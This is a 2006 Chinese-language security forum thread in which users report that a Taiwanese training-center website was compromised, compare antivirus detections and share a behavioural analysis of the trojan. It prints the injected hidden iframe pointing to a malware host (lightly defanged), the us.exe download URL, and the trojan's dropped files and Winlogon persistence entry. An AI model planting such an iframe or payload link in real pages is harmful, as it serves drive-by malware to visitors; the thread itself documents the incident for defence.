【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

可列印頁面

在單一頁面顯示本主題中的 40 個文章

2006-11-01, 08:56 AM
hycnet

【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

昨天同事告知...最後她做了一條有關media player的註冊機碼刪除
結果導致她登入XP後馬上又登出(安全模式也一樣)..

我自己的AntiVir 7測試結果[url]http://www.iiiedu.org.tw(進首頁就有,其他部份頁面也有[/url]) 的確也是有問題的..

clamav,trend也有欄到病毒但沒全發現,因為我認為該網址其中iframe連結到[url]www.fxkfxk.com的網站中似乎不只一種惡意程式[/url]...

請大家看看手法是不是跟手機王一樣...請資策會處理似乎沒人理...還是我多心
這些程式都誤判了:|||: ..(應該不至於吧...)

總之...org.tw內隱含大陸網站的連結...我覺得很不正常吶...:(
2006-11-01, 09:27 AM
yuping

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

的確有唷
實際抓下來是個vbscript
在download一個
[url]http://www.fxkfxk.com/333/us.exe[/url]
2006-11-01, 09:42 AM
password

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

[QUOTE=yuping]的確有唷
實際抓下來是個vbscript
在download一個
[url]http://www.fxkfxk.com/333/us.exe[/url][/QUOTE]

nod32抓的到...XD
Win32/TrojanDownloader.Delf.NJH trojan
:|||: ...
最近攻擊真多...
2006-11-01, 09:53 AM
DarkSkyline

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

AVG Anti-Virus FreeEdition 偵測到 "Win32/PEPatch"病毒,會自動從 [url]www.iiiedu.org.tw[/url] 網站下載 PDLL.dll 到 C:\Windows\System\資料夾內,請大家用自己的防毒軟體偵測一下吧~:D
2006-11-01, 09:54 AM
hycnet

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

另一個小小心得分享

基本上我這邊連上.....iiied.org.tw總共會經過3道防毒程式的"處理"
已更新至今日的病毒碼
1.clamav (proxy)
2.trend (proxy)
3.AntiVir 7 Free版(本機)

但1,2無法在 proxy把病毒全排除,最後還好本機防毒夠力...
再搭配同事使用symantec 10的經驗...看來我明年得評估AntiVir的
企業解決方案了...:D
2006-11-01, 02:37 PM
hn1271n

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧
2006-11-01, 02:53 PM
hn1271n

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

請有偵測到病毒的人向刑事警察局檢舉吧 [url]http://www.cib.gov.tw/mail/Mail_Report.aspx[/url]
2006-11-01, 02:59 PM
haol

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

[QUOTE=hn1271n]請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧[/QUOTE]
卡巴還掃不到，已回報了:)
2006-11-01, 04:05 PM
sai7sai

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

以下是這隻木馬的行為：

1. 首頁被植入
<iframe src="hxxp://www.fxkfxk.com/333/us.asp" width="0" height="0" scrolling="no" frameborder="0"></iframe>

2. 檔案 us.asp 是一個 VBScript，它會下載或執行 us.exe。

3. 執行之後，系統會產生：
[Added process]
C:\WINDOWS\svchost.exe

[DLL Injection]
C:\WINDOWS\svchost.exe 注入某些執行程序，例如， svchost.exe 等等。
C:\WINDOWS\system32\PDLL.dll 注入某些執行程序，例如， svchost.exe、explorer.exe 等等。
C:\WINDOWS\winnt.dll 注入某些執行程序，例如，瀏覽器等等。
C:\WINDOWS\winntKey.DLL 注入某些執行程序，例如， svchost.exe 等等。

[Added service]
NAME=PigeonServer
DISPLAY=PigeonServer
FILE=C:\WINDOWS\winnt.exe

[Drop Files]
C:\Program Files\WindowsUpdate\1.exe
C:\Program Files\WindowsUpdate\2.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\PDLL.dll
C:\WINDOWS\winnt.dll
C:\WINDOWS\winnt.exe
C:\WINDOWS\winntKey.DLL

[Added Registries]
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\svchost.exe,
2006-11-01, 06:53 PM
kaspersky

回覆: 【討論】請問資策會教育訓練中心網站是否有被植入後門程式?

Hello,

us.exe - Trojan-Downloader.Win32.Delf.em - new malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

--
Best regards, Leonid Khovansky
Virus analyst, Kaspersky Lab.
e-mail: [email][email protected][/email]
[url]http://www.kaspersky.com/[/url]

在單一頁面顯示本主題中的 40 個文章

【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

【討論】請問資策會教育訓練中心網站是否有被植入後門程式?